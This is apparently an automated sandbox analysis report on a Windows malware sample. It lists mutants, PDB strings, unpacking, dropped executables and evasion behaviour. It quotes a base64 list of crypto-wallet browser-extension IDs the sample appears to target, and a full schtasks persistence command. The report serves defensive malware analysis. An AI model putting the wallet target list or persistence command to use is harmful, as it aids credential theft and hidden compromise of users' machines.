GpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4044:120:WilError_01
              Source: C:\Windows\SysWOW64\fontview.exeMutant created: \Sessions\1\BaseNamedObjects\Random name
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_01
              Source: C:\Windows\SysWOW64\fontview.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
              Source: Library.exe.25.dr, ue06e.csCryptographic APIs: 'CreateDecryptor'
              Source: Library.exe.25.dr, ue03f.csCryptographic APIs: 'CreateDecryptor'
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\226F.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\226F.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\2560.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\2560.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\dllhost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\dllhost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\dllhost.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
              Source: aw9Ynwqd1x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: wkernel32.pdb source: fontview.exe, 00000013.00000003.386062019.0000000005086000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.386284855.00000000051A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WINMMBASE.pdbUGP source: fontview.exe, 00000013.00000003.421038965.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: fontview.exe, 00000013.00000003.395722778.0000000005088000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcrt.pdb source: fontview.exe, 00000013.00000003.389771646.0000000005150000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdb source: fontview.exe, 00000013.00000003.391168128.0000000005150000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: fontview.exe, 00000013.00000003.385093474.00000000053B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.383912006.0000000005084000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdb source: fontview.exe, 00000013.00000003.406207334.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406327938.0000000005110000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000018.00000003.490751661.000002275D660000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdbGCTL source: fontview.exe, 00000013.00000003.401619984.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdbUGP source: fontview.exe, 00000013.00000003.391810335.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\zetoxu68-vepibayawu-woxixawenobaju_93\fucabopiso_d.pdbp source: aw9Ynwqd1x.exe, 00000000.00000000.246785291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dbjigst, 0000000D.00000000.336022819.0000000000401000.00000020.00000001.01000000.00000008.sdmp
              Source: Binary string: _C:\fepovilorefego5.pdb source: explorer.exe, 00000001.00000003.337271065.00000000082B0000.00000004.00000001.00020000.00000000.sdmp, 336E.exe, 0000000E.00000000.336659529.0000000000401000.00000020.00000001.01000000.00000009.sdmp
              Source: Binary string: wgdi32.pdb source: fontview.exe, 00000013.00000003.392076418.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: setupapi.pdbUGP source: fontview.exe, 00000013.00000003.423766732.00000000059F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.421577482.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdb source: fontview.exe, 00000013.00000003.419420089.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdb source: fontview.exe, 00000013.00000003.388608530.0000000005080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdb source: fontview.exe, 00000013.00000003.391685317.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\zetoxu68-vepibayawu-woxixawenobaju_93\fucabopiso_d.pdb source: aw9Ynwqd1x.exe, 00000000.00000000.246785291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dbjigst, 0000000D.00000000.336022819.0000000000401000.00000020.00000001.01000000.00000008.sdmp
              Source: Binary string: cfgmgr32.pdbUGP source: fontview.exe, 00000013.00000003.414369645.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\nujiwucosunes\vezik.pdb source: explorer.exe, 00000001.00000003.342443196.000000000B700000.00000004.00000010.00020000.00000000.sdmp, 2560.exe, 0000000F.00000002.356859286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2560.exe, 0000000F.00000000.341351275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2560.exe, 00000011.00000000.353377908.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
              Source: Binary string: shell32.pdb source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 2560.exe, 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdbUGP source: fontview.exe, 00000013.00000003.391168128.0000000005150000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Timayiko\Kodale\hiwer\Fami\Somayofa wiho.pdb source: 226F.exe, 00000010.00000002.479266806.000000000114C000.00000002.00000001.01000000.0000000B.sdmp, 226F.exe, 00000010.00000000.352256641.000000000114C000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: msvcp_win.pdb source: fontview.exe, 00000013.00000003.395588310.0000000005080000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.445193713.00000000053B1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: psapi.pdbUGP source: fontview.exe, 00000013.00000003.421493166.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32.pdbUGP source: fontview.exe, 00000013.00000003.392076418.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdb source: fontview.exe, 00000013.00000003.419485427.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdb source: fontview.exe, 00000013.00000003.386704960.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shlwapi.pdb source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mpr.pdb source: fontview.exe, 00000013.00000003.425517005.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdb source: fontview.exe, 00000013.00000003.401619984.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdbGCTL source: fontview.exe, 00000013.00000003.391685317.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shlwapi.pdbUGP source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: setupapi.pdb source: fontview.exe, 00000013.00000003.423766732.00000000059F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.421577482.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 3C:\nujiwucosunes\vezik.pdb` source: explorer.exe, 00000001.00000003.342443196.000000000B700000.00000004.00000010.00020000.00000000.sdmp, 2560.exe, 0000000F.00000002.356859286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2560.exe, 0000000F.00000000.341351275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2560.exe, 00000011.00000000.353377908.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 2560.exe, 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: combase.pdbUGP source: fontview.exe, 00000013.00000003.401758325.00000000055B3000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.403198719.0000000005820000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: fontview.exe, 00000013.00000003.395722778.0000000005088000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdbUGP source: fontview.exe, 00000013.00000003.386704960.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdbUGP source: fontview.exe, 00000013.00000003.391748694.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdbUGP source: fontview.exe, 00000013.00000003.400623587.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.400263237.0000000005084000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shell32.pdbUGP source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdbUGP source: fontview.exe, 00000013.00000003.419485427.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdbGCTL source: fontview.exe, 00000013.00000003.419420089.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WINMMBASE.pdb source: fontview.exe, 00000013.00000003.421038965.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: comdlg32.pdb source: fontview.exe, 00000013.00000003.405354581.000000000508E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.405703009.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdbUGP source: fontview.exe, 00000013.00000003.392165110.0000000005102000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.393323768.000000000542C000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: profapi.pdb source: fontview.exe, 00000013.00000003.419057448.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdb source: fontview.exe, 00000013.00000003.421384076.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: comdlg32.pdbUGP source: fontview.exe, 00000013.00000003.405354581.000000000508E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.405703009.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdb source: fontview.exe, 00000013.00000003.392165110.0000000005102000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.393323768.000000000542C000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shcore.pdbUGP source: fontview.exe, 00000013.00000003.406207334.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406327938.0000000005110000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000018.00000003.490751661.000002275D660000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mpr.pdbUGP source: fontview.exe, 00000013.00000003.425517005.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: sechost.pdb source: fontview.exe, 00000013.00000003.390338279.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: fontview.exe, 00000013.00000003.385093474.00000000053B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.383912006.0000000005084000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\fepovilorefego5.pdb source: explorer.exe, 00000001.00000003.337271065.00000000082B0000.00000004.00000001.00020000.00000000.sdmp, 336E.exe, 0000000E.00000000.336659529.0000000000401000.00000020.00000001.01000000.00000009.sdmp
              Source: Binary string: ole32.pdbUGP source: fontview.exe, 00000013.00000003.420283986.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.419630627.000000000508A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdbUGP source: fontview.exe, 00000013.00000003.419219769.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdb source: fontview.exe, 00000013.00000003.419219769.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdb source: fontview.exe, 00000013.00000003.425560872.0000000005000000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.446231172.0000000004F16000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ole32.pdb source: fontview.exe, 00000013.00000003.420283986.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.419630627.000000000508A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdbUGP source: fontview.exe, 00000013.00000003.416675694.0000000005B80000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.414492613.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdbUGP source: fontview.exe, 00000013.00000003.418853263.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdbGCTL source: fontview.exe, 00000013.00000003.386062019.0000000005086000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.386284855.00000000051A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: sechost.pdbUGP source: fontview.exe, 00000013.00000003.390338279.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: comctl32.pdbUGP source: fontview.exe, 00000013.00000003.407879570.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406570415.00000000055BF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: fontview.exe, 00000013.00000003.418853263.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: psapi.pdb source: fontview.exe, 00000013.00000003.421493166.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdbUGP source: fontview.exe, 00000013.00000003.395588310.0000000005080000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.445193713.00000000053B1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdbUGP source: fontview.exe, 00000013.00000003.388608530.0000000005080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdb source: fontview.exe, 00000013.00000003.391748694.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cfgmgr32.pdb source: fontview.exe, 00000013.00000003.414369645.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdb source: fontview.exe, 00000013.00000003.391810335.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdbUGP source: fontview.exe, 00000013.00000003.421125892.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.421276873.0000000005120000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: fontview.exe, 00000013.00000003.401758325.00000000055B3000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.403198719.0000000005820000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdb source: fontview.exe, 00000013.00000003.416675694.0000000005B80000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.414492613.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
              Source: Binary string: profapi.pdbUGP source: fontview.exe, 00000013.00000003.419057448.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdbUGP source: fontview.exe, 00000013.00000003.425560872.0000000005000000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.446231172.0000000004F16000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdb source: fontview.exe, 00000013.00000003.421125892.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.421276873.0000000005120000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdb source: fontview.exe, 00000013.00000003.400623587.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.400263237.0000000005084000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: comctl32.pdb source: fontview.exe, 00000013.00000003.407879570.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406570415.00000000055BF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdbUGP source: fontview.exe, 00000013.00000003.421384076.0000000005000000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\AppData\Local\Temp\336E.exeUnpacked PE file: 14.2.336E.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Local\Temp\2560.exeUnpacked PE file: 17.2.2560.exe.400000.0.unpack
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeUnpacked PE file: 0.2.aw9Ynwqd1x.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Roaming\dbjigstUnpacked PE file: 13.2.dbjigst.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Local\Temp\336E.exeUnpacked PE file: 14.2.336E.exe.400000.0.unpack .text:ER;.data:W;.huxuho:R;.gini:R;.vab:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\AppData\Local\Temp\2560.exeUnpacked PE file: 17.2.2560.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Source: Library.exe.25.dr, ue061.cs.Net Code: ? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_0040CE51 push ecx; ret
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_0040CE51 push ecx; ret
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_004363BD push esi; ret
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_004139F8 push ecx; ret
              Source: 336E.exe.1.drStatic PE information: section name: .huxuho
              Source: 336E.exe.1.drStatic PE information: section name: .gini
              Source: 336E.exe.1.drStatic PE information: section name: .vab
              Source: svcupdater.exe.14.drStatic PE information: section name: .huxuho
              Source: svcupdater.exe.14.drStatic PE information: section name: .gini
              Source: svcupdater.exe.14.drStatic PE information: section name: .vab
              Source: 5898187.dll.16.drStatic PE information: section name: .00cfg
              Source: initial sampleStatic PE information: section name: .text entropy: 7.880058673023214
              Source: initial sampleStatic PE information: section name: .text entropy: 7.648160210316085
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dbjigstJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\336E.exeFile created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\336E.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\226F.exeJump to dropped file
              Source: C:\Windows\System32\dllhost.exeFile created: C:\Users\user\AppData\Local\Temp\Library.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dbjigstJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2560.exeJump to dropped file
              Source: C:\Windows\SysWOW64\fontview.exeFile created: C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\226F.exeFile created: C:\Users\user\AppData\Local\Temp\5898187.dllJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\AppData\Local\Temp\336E.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\aw9ynwqd1x.exeJump to behavior
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\dbjigst:Zone.Identifier read attributes | delete
              Source: C:\Users\user\AppData\Local\Temp\336E.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\AppData\Local\Temp\336E.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\336E.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\226F.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\226F.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\2560.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\2560.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\2560.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\2560.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
